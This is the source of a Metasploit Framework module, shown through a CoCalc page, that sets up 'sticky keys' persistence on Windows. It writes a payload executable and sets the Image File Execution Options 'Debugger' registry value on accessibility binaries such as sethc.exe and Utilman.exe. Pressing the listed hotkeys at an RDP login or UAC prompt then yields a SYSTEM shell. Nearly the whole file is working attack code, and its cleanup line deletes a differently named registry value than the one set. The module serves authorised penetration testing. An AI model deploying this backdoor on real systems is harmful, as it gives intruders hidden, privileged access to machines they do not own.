Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/persistence/accessibility_features_debugger.rb
31427 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Post::File

10
  include Msf::Exploit::EXE

11
  include Msf::Exploit::Local::Persistence

12
  prepend Msf::Exploit::Remote::AutoCheck

13
  include Msf::Post::Windows::Registry

14
  include Msf::Post::Windows::Priv

15
  include Msf::Exploit::Deprecated

16
  moved_from 'post/windows/manage/sticky_keys'

17


18
  DEBUG_REG_PATH = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options'

19
  DEBUG_REG_VALUE = 'Debugger'

20


21
  def initialize(info = {})

22
    super(

23
      update_info(

24
        info,

25
        'Name' => 'Accessibility Features (Sticky Keys) Persistence via Debugger Registry Key',

26
        'Description' => %q{

27
          This module makes it possible to apply the 'sticky keys' hack to a session with appropriate

28
          rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP

29
          login screen or via a UAC confirmation dialog. The module modifies the Debug registry setting

30
          for certain executables.

31


32
          The module options allow for this hack to be applied to:

33


34
          SETHC   (sethc.exe is invoked when SHIFT is pressed 5 times),

35
          UTILMAN (Utilman.exe is invoked by pressing WINDOWS+U),

36
          OSK     (osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard),

37
          DISP    (DisplaySwitch.exe is invoked by pressing WINDOWS+P),

38
          NARRATOR (Narrator.exe is invoked by pressing WINDOWS+CTR+ENTER),

39
          ATBROKER (AtBroker.exe is invoked by launching accessibility features from the login screen, such as WINDOWS+CTR+ENTER).

40


41
          Custom payloads and binaries can be run as part of this exploit, but must be manually uploaded

42
          to the target prior to running the module.

43
        },

44
        'Author' => [

45
          'OJ Reeves', # original module

46
          'h00die' # persistence mixin, narrator, atbroker, docs

47
        ],

48
        'Platform' => ['win'],

49
        'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],

50
        'SessionTypes' => ['meterpreter', 'shell'],

51
        'References' => [

52
          ['URL', 'https://web.archive.org/web/20170201184448/https://social.technet.microsoft.com/Forums/windows/en-US/a3968ec9-5824-4bc2-82a2-a37ea88c273a/sticky-keys-exploit'],

53
          ['URL', 'https://blog.carnal0wnage.com/2012/04/privilege-escalation-via-sticky-keys.html'],

54
          ['URL', 'https://support.microsoft.com/en-us/windows/appendix-b-narrator-keyboard-commands-and-touch-gestures-8bdab3f4-b3e9-4554-7f28-8b15bd37410a'],

55
          ['ATT&CK', Mitre::Attack::Technique::T1183_IMAGE_FILE_EXECUTION_OPTIONS_INJECTION],

56
          ['ATT&CK', Mitre::Attack::Technique::T1546_008_ACCESSIBILITY_FEATURES],

57
          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],

58
          ['URL', 'https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/']

59
        ],

60
        'Targets' => [

61
          [ 'Automatic', {} ]

62
        ],

63
        'DefaultTarget' => 0,

64
        'DisclosureDate' => '1995-04-24', # windows 95 release date which included first sticky keys

65
        'Notes' => {

66
          'Stability' => [CRASH_SAFE],

67
          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],

68
          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]

69
        }

70
      )

71
    )

72


73
    register_options([

74
      OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.']),

75
      OptEnum.new('BINARY', [true, 'The target binary to add the exploit to.', 'SETHC', ['SETHC', 'UTILMAN', 'OSK', 'DISP', 'NARRATOR', 'ATBROKER']]),

76
    ])

77
  end

78


79
  #

80
  # Returns the name of the executable to modify the debugger settings of.

81
  #

82
  def get_target_exe_name

83
    case datastore['BINARY']

84
    when 'UTILMAN'

85
      'Utilman.exe'

86
    when 'OSK'

87
      'osk.exe'

88
    when 'DISP'

89
      'DisplaySwitch.exe'

90
    when 'NARRATOR'

91
      'Narrator.exe'

92
    when 'ATBROKER'

93
      'AtBroker.exe'

94
    else

95
      'sethc.exe'

96
    end

97
  end

98


99
  #

100
  # Returns the key combinations required to invoke the exploit once installed.

101
  #

102
  def get_target_key_combo

103
    case datastore['BINARY']

104
    when 'UTILMAN'

105
      'WINDOWS+U'

106
    when 'OSK'

107
      'WINDOWS+U, then launching the on-screen keyboard'

108
    when 'DISP'

109
      'WINDOWS+P'

110
    when 'NARRATOR'

111
      'WINDOWS+CTR+ENTER'

112
    when 'ATBROKER'

113
      'Launching accessibility features from the login screen (such as WINDOWS+CTR+ENTER)'

114
    else

115
      'SHIFT 5 times'

116
    end

117
  end

118


119
  #

120
  # Returns the full path to the target's registry key based on the current target

121
  # settings.

122
  #

123
  def get_target_exe_reg_key

124
    "#{DEBUG_REG_PATH}\\#{get_target_exe_name}"

125
  end

126


127
  def writable_dir

128
    d = super

129
    return session.sys.config.getenv(d) if d.start_with?('%')

130


131
    d

132
  end

133


134
  def check

135
    print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value

136
    return CheckCode::Safe("#{writable_dir} doesnt exist") unless exists?(writable_dir)

137


138
    return CheckCode::Safe('You have admin rights to run this Module') unless is_admin?

139


140
    CheckCode::Appears('Likely exploitable')

141
  end

142


143
  def install_persistence

144
    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))

145
    temp_path = writable_dir

146
    payload_exe = generate_payload_exe

147
    payload_pathname = temp_path + '\\' + payload_name + '.exe'

148
    vprint_status("Payload pathname: #{payload_pathname}")

149
    fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, payload_exe)

150
    target_key = get_target_exe_reg_key

151
    registry_createkey(target_key)

152
    registry_setvaldata(target_key, DEBUG_REG_VALUE, payload_pathname, 'REG_SZ')

153


154
    print_good("'Sticky keys' successfully added. Launch the exploit at an RDP or UAC prompt by pressing #{get_target_key_combo}.")

155
    @clean_up_rc << "rm \"#{payload_pathname.gsub('\\', '\\\\\\\\')}\"\n"

156
    @clean_up_rc << "execute -f cmd.exe -a \"/c reg delete \"#{target_key}\" /v GlobalFlag /f\" -H\n"

157
  end

158
end

159


160